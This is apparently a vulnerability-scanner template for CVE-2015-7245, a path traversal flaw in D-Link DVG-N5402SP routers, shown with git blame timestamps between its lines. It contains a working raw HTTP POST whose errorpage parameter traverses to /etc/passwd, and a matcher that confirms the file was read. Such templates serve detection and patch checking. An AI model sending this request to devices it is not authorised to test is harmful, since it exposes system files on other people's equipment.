2022-08-16 02:32:51 +00:00
id : CVE-2015-7245
info :
2022-10-10 19:22:59 +00:00
name : D-Link DVG-N5402SP - Local File Inclusion
2022-08-16 02:32:51 +00:00
author : 0x_Akoko
severity : high
2022-09-02 06:03:10 +00:00
description : |
2022-10-10 19:22:59 +00:00
D-Link DVG-N5402SP is susceptible to local file inclusion in products with firmware W1000CN-00, W1000CN-03, or W2000EN-00. A remote attacker can read sensitive information via a .. (dot dot) in the errorpage parameter.
2022-09-02 05:50:32 +00:00
reference :
- https://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html
- https://www.exploit-db.com/exploits/39409/
- https://nvd.nist.gov/vuln/detail/CVE-2015-7245
2022-08-16 02:32:51 +00:00
classification :
2022-09-04 15:21:50 +00:00
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
2022-08-16 02:32:51 +00:00
cve-id : CVE-2015-7245
2022-09-04 15:21:50 +00:00
cwe-id : CWE-22
tags : cve,cve2015,dlink,lfi,packetstorm,edb
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2022-08-16 02:32:51 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-09-02 06:03:10 +00:00
- raw :
- |
POST /cgibin/webproc HTTP/1.1
Host : {{Hostname}}
2022-08-16 02:32:51 +00:00
2022-09-02 06:03:10 +00:00
getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh
2022-08-16 02:32:51 +00:00
matchers :
- type : regex
2022-09-02 06:03:10 +00:00
part : body
2022-08-16 02:32:51 +00:00
regex :
- "root:.*:0:0:"
2022-10-10 19:22:59 +00:00
# Enhanced by mp on 2022/09/30